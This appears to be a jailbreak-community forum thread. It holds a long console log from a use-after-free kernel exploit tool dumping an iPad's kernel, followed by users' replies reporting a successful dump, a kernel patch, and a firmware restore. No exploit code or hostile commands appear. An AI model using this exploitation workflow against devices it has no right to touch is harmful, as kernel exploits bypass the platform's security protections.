[*] Mem: 0xffffff8009fc0000-0xffffff8009fc0000 File: 0x0000000000550000-0x0000000000550000 __PRELINK_STATE (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff8009fc0000-0xffffff8009fc0000 File: 0x0000000000550000-0x0000000000550000 __PRELINK_STATE.__kernel [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009fc0000-0xffffff8009fc0000 File: 0x0000000000550000-0x0000000000550000 __PRELINK_STATE.__kexts [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff800b4dc000-0xffffff800b584000 File: 0x0000000001a6c000-0x0000000001b12d8a __PRELINK_INFO (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff800b4dc000-0xffffff800b582d8a File: 0x0000000001a6c000-0x0000000001b12d8a __PRELINK_INFO.__info [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8009fc0000-0xffffff800a019280 File: 0x0000000000550000-0x00000000005a9280 __LINKEDIT (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[
] Kernel file size: 0x1a6c000 [src/lib/uaf_read.c:508 uaf_dump_kernel]
[*] Dumping __TEXT... [src/lib/uaf_read.c:528 uaf_dump_kernel]
[*] Dumping kernel bytes 0xffffff8009a06000-0xffffff8009ef4000... [src/lib/uaf_read.c:288 uaf_read]
[*] Dumping 0xffffff8009a06000-0xffffff8009a0e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a0e000-0xffffff8009a16000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a16000-0xffffff8009a1e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a1e000-0xffffff8009a26000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a26000-0xffffff8009a2e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a2e000-0xffffff8009a36000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a36000-0xffffff8009a3e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a3e000-0xffffff8009a46000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a46000-0xffffff8009a4e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a4e000-0xffffff8009a56000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a56000-0xffffff8009a5e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a5e000-0xffffff8009a66000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a66000-0xffffff8009a6e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a6e000-0xffffff8009a76000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a76000-0xffffff8009a7e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a7e000-0xffffff8009a86000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a86000-0xffffff8009a8e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a8e000-0xffffff8009a96000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a96000-0xffffff8009a9e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009a9e000-0xffffff8009aa6000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009aa6000-0xffffff8009aae000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009aae000-0xffffff8009ab6000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009ab6000-0xffffff8009abe000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009abe000-0xffffff8009ac6000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009ac6000-0xffffff8009ace000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009ace000-0xffffff8009ad6000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009ad6000-0xffffff8009ade000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009ade000-0xffffff8009ae6000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009ae6000-0xffffff8009aee000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009aee000-0xffffff8009af6000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009af6000-0xffffff8009afe000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009afe000-0xffffff8009b06000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b06000-0xffffff8009b0e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b0e000-0xffffff8009b16000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b16000-0xffffff8009b1e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b1e000-0xffffff8009b26000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b26000-0xffffff8009b2e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b2e000-0xffffff8009b36000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b36000-0xffffff8009b3e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b3e000-0xffffff8009b46000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b46000-0xffffff8009b4e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b4e000-0xffffff8009b56000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b56000-0xffffff8009b5e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b5e000-0xffffff8009b66000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b66000-0xffffff8009b6e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b6e000-0xffffff8009b76000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b76000-0xffffff8009b7e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b7e000-0xffffff8009b86000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b86000-0xffffff8009b8e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b8e000-0xffffff8009b96000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b96000-0xffffff8009b9e000... [src/lib/uaf_read.c:334 uaf_read]
[*] Dumping 0xffffff8009b9e000-0xffffff8009ba6000... [src/lib/uaf_read.c:334 uaf_read]

Hey, just saw your post. Maybe you wanna try what helped me further back with my iPad (see here).
I also had the right config but just the dumping crashed instantly, sometimes it went a little more, as you describe it. Tried like 50 times. And when it actually worked, it was with iTunes involved.

Well, coincidentally and without even following your steps, dumping worked! xD

Now I finally have the kernel! 💃

And finally!
[*] Successfully installed patch [src/lib/exploit.c:168 patch_host_special_port_4]

I can't thank you enough! 👍 Successfully nvpatch-ed and futurerestore-ed ❤️